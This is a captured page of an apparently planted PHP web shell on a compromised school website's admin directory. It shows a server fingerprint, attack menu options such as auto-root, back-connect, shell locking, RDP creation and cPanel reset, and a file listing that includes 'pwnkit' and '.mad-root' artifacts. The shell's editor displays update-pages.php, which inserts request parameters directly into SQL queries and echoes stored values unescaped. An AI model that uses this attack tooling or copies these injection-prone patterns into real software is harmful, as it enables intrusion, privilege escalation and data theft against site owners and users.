Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.191.165.192
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
dadeharsahib /
myadmin /
[ HOME SHELL ]
Name
Size
Permission
Action
build
[ DIR ]
drwxr-xr-x
cbse
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
gallery
[ DIR ]
drwxr-xr-x
news-coverage
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
photo
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
slider
[ DIR ]
drwxr-xr-x
tc
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add-album.php
1.75
KB
-rwxr-xr-x
add-cbse-corner.php
2.18
KB
-rwxr-xr-x
add-fee.php
3.65
KB
-rwxr-xr-x
add-gallery.php
3.17
KB
-rwxr-xr-x
add-news.php
2.68
KB
-rwxr-xr-x
add-pages.php
2.2
KB
-rwxr-xr-x
add-pdf.php
2.12
KB
-rwxr-xr-x
add-slide.php
2.15
KB
-rwxr-xr-x
add-tc.php
2.43
KB
-rwxr-xr-x
album.php
3.86
KB
-rwxr-xr-x
cbse-corner.php
4.02
KB
-rwxr-xr-x
config.php
736
B
-rwxr-xr-x
error_log
78.25
KB
-rwxr-xr-x
fee.php
2.78
KB
-rwxr-xr-x
footer.php
8.33
KB
-rwxr-xr-x
gallery.php
3.97
KB
-rwxr-xr-x
header.php
9.46
KB
-rwxr-xr-x
index.php
3.81
KB
-rwxr-xr-x
log.php
1.1
KB
-rwxr-xr-x
login.php
5.73
KB
-rwxr-xr-x
logout.php
122
B
-rwxr-xr-x
news.php
4.15
KB
-rwxr-xr-x
pages.php
3.99
KB
-rwxr-xr-x
pdf.php
3.96
KB
-rwxr-xr-x
pwnkit
0
B
-rwxr-xr-x
register.php
2.97
KB
-rwxr-xr-x
slide.php
3.9
KB
-rwxr-xr-x
tc.php
4.04
KB
-rwxr-xr-x
update-fee.php
4.37
KB
-rwxr-xr-x
update-news.php
2.78
KB
-rwxr-xr-x
update-pages.php
2.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update-pages.php
<?php include('header.php');?> <!-- =============================================== --> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Update Pages </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li><a href="#">Update Pages</a></li> <li class="active">Update</li> </ol> </section> <!-- Main content --> <section class="content"> <div class="callout callout-info"> <h4>Tip!</h4> <p>This page will use to add new page in the admin panel.</p> </div> <!-- Default box --> <?php if(isset($_GET['edit_id'])) { $page_id = $_GET['edit_id']; $get_single_record = "select * from pages where id = '$page_id'"; } if (isset($_POST['edit'])) { //print_r($_POST); $page_title = $_POST['title']; $page_desc = $_POST['editor']; $escape_desc = mysqli_escape_string($page_desc); $sql_query = "UPDATE pages SET title = '$page_title', description = '$page_desc' WHERE id = '$page_id'"; $mysql_2 = mysqli_query($mysql_con, $sql_query); if ($mysql_2 == 1){ echo "<script>window.location.href = 'pages.php';</script>"; } else { echo 'Something going wrong'; } /* // print_r($post); //header("Location: pages.php"); //print_r($mysql_2); exit(); */ } $result = mysqli_query($mysql_con, $get_single_record); $row = mysqli_fetch_array($result); ?> <form method="Post" role="form" enctype="multipart/form-data"> <div class="box-body"> <div class="form-group"> <label for="exampleInputEmail1">Page Title</label> <input type="text" name="title" class="form-control" id="exampleInputEmail1" value="<?php echo $row['title']; ?>" placeholder="Enter class"> </div> <div class="form-group"> <label for="exampleInputFile">Description</label> <textarea name="editor" > <?php echo $row['description']; ?> </textarea> </div> </div> <!-- /.box-body --> <div class="box-footer"> <button type="submit" name="edit" value="submit" class="btn btn-primary">Submit</button> </div> </form> <!-- /.box --> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <!--textarea script start--> <script>CKEDITOR.replace( 'editor' ); </script> <!--textarea script end--> <?php include("footer.php"); ?>
Close